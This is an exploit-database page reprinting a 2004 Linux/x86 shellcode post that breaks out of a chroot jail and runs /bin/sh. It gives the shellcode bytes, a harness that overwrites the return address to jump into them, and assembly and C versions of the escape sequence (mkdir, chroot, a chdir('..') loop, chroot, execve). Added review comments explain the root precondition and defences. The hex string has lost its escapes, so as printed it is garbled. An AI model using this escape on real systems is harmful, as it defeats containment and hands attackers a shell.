Linux/x86 – Break chroot + execve(/bin/sh) Shellcode (80 bytes)
漏洞ID | 1054620 | 漏洞类型 | |
发布时间 | 2004-09-12 | 更新时间 | 2004-09-12 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* This is Linux chroot()/execve() code. It is 80 bytes long. I have some *
* ideas how to make it smaller, but till then use this one. *
* signed predator *
* linux registered user : 181116 *
* preedator(at)sendmail(dot)ru *
***************************************************************************/
/*
 * sc: the payload that the header comment describes as 80-byte Linux
 * chroot()/execve() code. The author's commented assembly and C versions
 * further down give the intended sequence: syscall 0x17 (setuid on i386)
 * with a zero argument, mkdir of a scratch directory, chroot() into it,
 * chdir("..") in a counted loop, chroot(".."), then execve of /bin/sh.
 *
 * NOTE(review): as printed on this page the literal has no backslashes in
 * front of the hex pairs, so here it is ordinary ASCII text rather than the
 * byte sequence shown in the disassembly; the escapes appear to have been
 * lost when the page was extracted.
 *
 * Defensive context: the sequence only works for a process that still holds
 * root (CAP_SYS_CHROOT) inside the jail. chroot(2) documents that the call
 * does not change the working directory and is not intended as a
 * containment mechanism for privileged processes. Dropping root and that
 * capability before handling untrusted input removes the precondition;
 * mount namespaces with pivot_root, or a seccomp filter that denies
 * chroot to the confined process, are the sturdier controls. A chroot call
 * issued by a process that is already chrooted is a useful audit signal.
 */
char sc[]="x31xc0x31xdbx31xc9xb0x17xcdx80xebx36x5ex88x46x0a"
"x8dx5ex05xb1xedxb0x27xcdx80x31xc0xb0x3dxcdx80x83"
"xc3x02xb0x0cxcdx80xe0xfaxb0x3dxcdx80x89x76x08x31"
"xc0x88x46x07x89x46x0cx89xf3x8dx4ex08x89xc2xb0x0b"
"xcdx80xe8xc5xffxffxff/bin/sh..";
/*
 * Test harness from the original post. It takes the address of its own
 * local `ret`, moves two pointer-sized slots past it, prints the string
 * length of sc, and then stores the address of sc through that pointer.
 *
 * NOTE(review): the store through &ret+2 writes outside the object `ret`
 * and is undefined behaviour in C. The author presumably relies on that
 * slot being main's saved return address on a 32-bit x86 build of the time;
 * that depends entirely on compiler, flags and stack layout (confirm before
 * drawing conclusions from a test run). Where data pages are enforced as
 * non-executable, a transfer of control into a data array such as sc
 * faults instead of running it.
 */
int main(){
/* points two pointer-sized slots above the local `ret` itself */
int *ret=(int *)(&ret+2);
/* NOTE(review): no <stdio.h> or <string.h> include is visible on the page;
   strlen returns size_t, which does not match %d; the trailing "n" looks
   like a newline escape that lost its backslash */
printf("len : %dn",strlen(sc));
/* the cast to int truncates the address wherever pointers are wider than int */
*ret=(int)sc;
/* no return statement: main falls off the end of its body */
}
// Asm code
/*********************************************
*int main(){ *
* __asm__(" xorl %eax,%eax n" *
* " xorl %ebx,%ebx n" *
* " xorl %ecx,%ecx n" *
* " movb $0x17,%al n" *
* " int $0x80 n" *
* " jmp 0x36 n" *
* " popl %esi n" *
* " movb %al,0xa(%esi) n" *
* " leal 0x5(%esi),%ebx n" *
* " movb $0xed,%cl n" *
* " movb $0x27,%al n" *
* " int $0x80 n" *
* " xorl %eax,%eax n" *
* " movb $0x3d,%al n" *
* " int $0x80 n" *
* " addl $0x2,%ebx n" *
* " movb $0xc,%al n" *
* " int $0x80 n" *
* " loopne -0x06 n" *
* " movb $0x3d,%al n" *
* " int $0x80 n" *
* " movl %esi,0x8(%esi) n" *
* " xorl %eax,%eax n" *
* " movb %al,0x7(%esi) n" *
* " movl %eax,0xc(%esi) n" *
* " movl %esi,%ebx n" *
* " leal 0x8(%esi),%ecx n" *
* " movl %eax,%edx n" *
* " movb $0xb,%al n" *
* " int $0x80 n" *
* " call -0x3b n" *
* " .string "/bin/sh.." n"); *
*} *
*********************************************/
//C code
/**********************************************
*int main(){ *
* char *sh[2]={"/bin/sh",NULL}; *
* int gg=0xed *
* mkdir("sh..",gg); *
* chroot("sh.."); *
* while (gg!=0){ *
* chdir("..");gg--; *
* } *
* chroot(".."); *
* execve(sh[0],sh,NULL); *
*} *
***********************************************/
// milw0rm.com [2004-09-12]